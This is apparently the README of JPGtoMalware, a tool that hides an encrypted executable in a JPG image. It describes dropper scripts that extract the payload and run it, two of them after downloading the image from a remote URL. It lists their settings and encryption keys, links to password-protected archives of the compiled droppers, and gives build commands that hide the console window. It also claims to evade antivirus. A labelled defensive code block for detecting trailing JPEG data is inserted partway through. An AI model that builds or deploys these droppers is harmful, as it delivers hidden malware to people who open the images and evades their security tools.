JPGtoMalware

It embeds an executable file or payload inside a JPG file. The method the program uses is not one of the classic steganography techniques (secure cover selection, least significant bit, palette-based embedding, etc.), so it introduces no distortion into the JPG, and the payload size does not have to be proportional to the image size. The JPG still displays normally in any image viewer or web application. It can bypass various security programs such as firewalls and antivirus. If the file is examined in detail, it is easier to detect than steganographic embedding; however, since the payload inside the JPG is encrypted, it cannot easily be decrypted. The program also uses “garbage code insertion/dead-code insertion” to keep the payload from being caught by antivirus at runtime.
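Because the description above says the image stays undistorted and still renders normally, the practical detection point for a defender is data that sits after the JPEG's own content rather than anything inside the pixel data. The following is an added example, not code from the JPGtoMalware project: it walks the JPEG marker structure to the End-Of-Image marker, measures whatever follows it, and reports that trailer's Shannon entropy (an encrypted payload like the one this tool produces reads as near-random, close to 8 bits per byte). The sample bytes are constructed here and are not a decodable picture, and the premise that the payload travels as a trailer after EOI is an assumption about the tool, not something the README states.

```python
import math
import struct
from collections import Counter

SOI, EOI = b"\xff\xd8", b"\xff\xd9"   # Start Of Image / End Of Image markers

def jpeg_image_end(data: bytes):
    """Walk the JPEG marker segments; return the offset just past EOI, or None if malformed."""
    if not data.startswith(SOI):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None                                  # a marker must start here
        marker = data[pos + 1]
        if marker == 0xFF:                               # fill byte ahead of a marker
            pos += 1
            continue
        if marker == 0xD9:                               # EOI: the image's own content ends here
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:     # TEM / RSTn carry no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        pos += 2 + struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker == 0xDA:                               # SOS: skip entropy-coded scan data
            while pos + 1 < len(data) and not (data[pos] == 0xFF and data[pos + 1] != 0x00
                                                and not 0xD0 <= data[pos + 1] <= 0xD7):
                pos += 1                                 # stuffed FF00 and RSTn are data, not markers
    return None

def shannon_entropy(buf: bytes) -> float:                # bits per byte: encrypted data nears 8.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def inspect_jpeg(data: bytes) -> dict:
    """Report structural validity and whatever trails the EOI marker (size and entropy)."""
    end = jpeg_image_end(data)
    trailer = data[end:] if end is not None else b""
    return {"valid_jpeg": end is not None, "trailing_bytes": len(trailer),
            "trailing_entropy": round(shannon_entropy(trailer), 2),
            "suspicious": end is None or len(trailer) > 0}

def build_sample_jpeg(trailer: bytes = b"") -> bytes:    # constructed test input, not a real picture
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"          # includes a stuffed FF00 and an RST0
    return SOI + app0 + sos + scan + EOI + trailer
```

A trailer is only a lead: legitimate files also carry small amounts of post-EOI data (some cameras and editors append metadata), so a large, high-entropy trailer, or one in the gigabyte range that the FILL_SIZE setting below would produce, is the combination worth alerting on.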

File(s)

1) InjectingMalwareIntoJPG.py : The script that embeds the payload into the JPG file.

2) malware_v1.py : The script that extracts the malware from a local image file and runs it. The JPG file carrying the malware must be in the same folder. (Default JPG name: “malwareJPG.jpg”)

3) malware_v2.py : The script that extracts the malware from a JPG file downloaded from the internet and runs it. (Default URL: “https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg“) (After the script is compiled, the values of its variables can be recovered by static analysis of the program.)

4) malware_v3.py : The script that extracts the malware from a JPG file downloaded from the internet and runs it. (Default URL: “https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg“) (After the script is compiled, the values of its variables can be recovered by dynamic analysis of the program.)

The compiled version of the program can be downloaded from the links below.

“Injecting Malware Into JPG File”
InjectingMalwareIntoJPG.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1ENt-d0q-Yv-4mZALiUwqvZtp23JH415s/view?usp=sharing
“Malware V1”
malware_v1.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1kG2O2pKYxHz03zWpmywA-9CluSP7Orav/view?usp=sharing
“Malware V2”
malware_v2.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1yxvb3BjH3Xi3vbE7VTyBDeWGhr8v3cSX/view?usp=sharing
“Malware V3”
malware_v3.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1f_JQSrKTknlTg31rDeKOF3NpAVN9NO3C/view?usp=sharing

Requirements

Required libraries: colorama, cryptography, requests, pyinstaller

pip install colorama
pip install cryptography
pip install requests
pip install pyinstaller

“pyinstaller” is used to build each script into a single-file executable.

Settings

InjectingMalwareIntoJPG.py (Default Settings)

class SETTINGS():
    PROGRAM_NAME = "Injecting Malware Into JPG"         # Program Name
    JPG_FILE = 'linux.jpg'                              # Jpg file name      # Overwritten while the program runs.
    EXE_FILE = "malware.exe"                            # Malware file name  # Overwritten while the program runs.
    OUT_FILE = "malwareJPG.jpg"                         # Out file name
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{'         # Encryption key
    PRIVATE_NUMBER = 19                                 # Encryption number
    BUFFER     = 1024                                   # Buffer for memory optimization
    FILL_SIZE  = 1073741824  # 1024x1024x1024 (1 GB)    # Size used to inflate the executable file.
    WAIT_TIME  = 0.1                                    # Waiting time between processes

malware_v1.py (Default Settings)

class SETTINGS():
    JPG_NAME = 'malwareJPG.jpg'                       # Jpg file name
    OUT_FILE = "malware_test.exe"                     # (to be created) Malware file name
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{'       # Encryption key
    PRIVATE_NUMBER = 19                               # Encryption number
    BUFFER     = 1024                                 # Buffer for memory optimization
    WAIT_TIME  = 0.1                                  # Waiting time between processes

malware_v2.py (Default Settings)

class SETTINGS():
    URL_ADDR = "https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg"  # url where the image is located
    OUT_FILE = "malware_test.exe"                       # (to be created) Malware file name
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{'         # Encryption key
    PRIVATE_NUMBER = 19                                 # Encryption number
    JPG_NAME  = 'malware_attack.jpg'                    # Jpg file name
    BUFFER     = 1024                                   # Buffer for memory optimization
    WAIT_TIME  = 0.1                                    # Waiting time between processes

malware_v3.py (Default Settings)

# Settings are stored encrypted to defeat static analysis.
# They can still be recovered with dynamic analysis.
class SETTINGS():
    KEY      = b'w3F4q2qyPG6WGHMwG6TrYq2R_ih9-_XTYH0H89J7UMk='
    URL_ADDR = b'gAAAAABiinQIPIhKqfLYaKt76lRXeboIJfCDr0NGsGROzSLe3ndeSo9RxM-EXNzsxFjwC-sU3axowzYaZCgsSfMl4qe4rWGaLbmNY0zD6_S34lOO10a_idkEQpfVSld0BSM7Yd4LXpgH6Fvkuw36QVlzmI_NvQJ6v5_mgEmCIzhSbiuMHJ-p9hdj28-2cMRa1BcFWZBbbRe7'
    OUT_FILE = b'gAAAAABiinRLcZh6qJ959Mzqup5ZLOnGwAQBAFPXD6hebpSpI4u3M24Npi3lIbTjW5ImEYwiz6WfD8JOyrcDzjR5gpTun4pI0gPHjf-xi_LSboOy5B7hwXo='
    PUPLIC_KEY = b'rt!1AtbydmUklvkaapdli+R)%=+4359?6#0!8-][gGu1nFGqoQrP[-{!Ue&&QcVb09@'
    PRIVATE_NUMBER = 4
    JPG_NAME  = b'gAAAAABiinSMlx2n6LSUzHfrET4UDnv_Fy7lc7h9zAKsC6p9ulM56yW0nXarAWvU2nmZqdNscglA9MLr2P3p20ADC3CWZsul4-YnfDiIFl13tZUnZ_BdDRU='
    BUFFER     = 1024
    WAIT_TIME  = 0.1

Compilation

[Language : Python 3.8.5]

# [Program that produces jpg with malware]
pyinstaller --onefile  --icon=InjectingMalwareIntoJPG.ico InjectingMalwareIntoJPG.py

# [Malware(s)]
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v1.py
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v2.py
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v3.py

Screenshots of the Program in Operation

Screenshot [1] (InjectingMalwareIntoJPG.exe)
Screenshot [2] (InjectingMalwareIntoJPG.exe)
Screenshot [3] (malware_v1.exe)
Screenshot [4] (malware_v1.exe)
Screenshot [5] (malware_v2.exe)
Screenshot [6] (malware_v3.exe)

Legal Warning

Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.
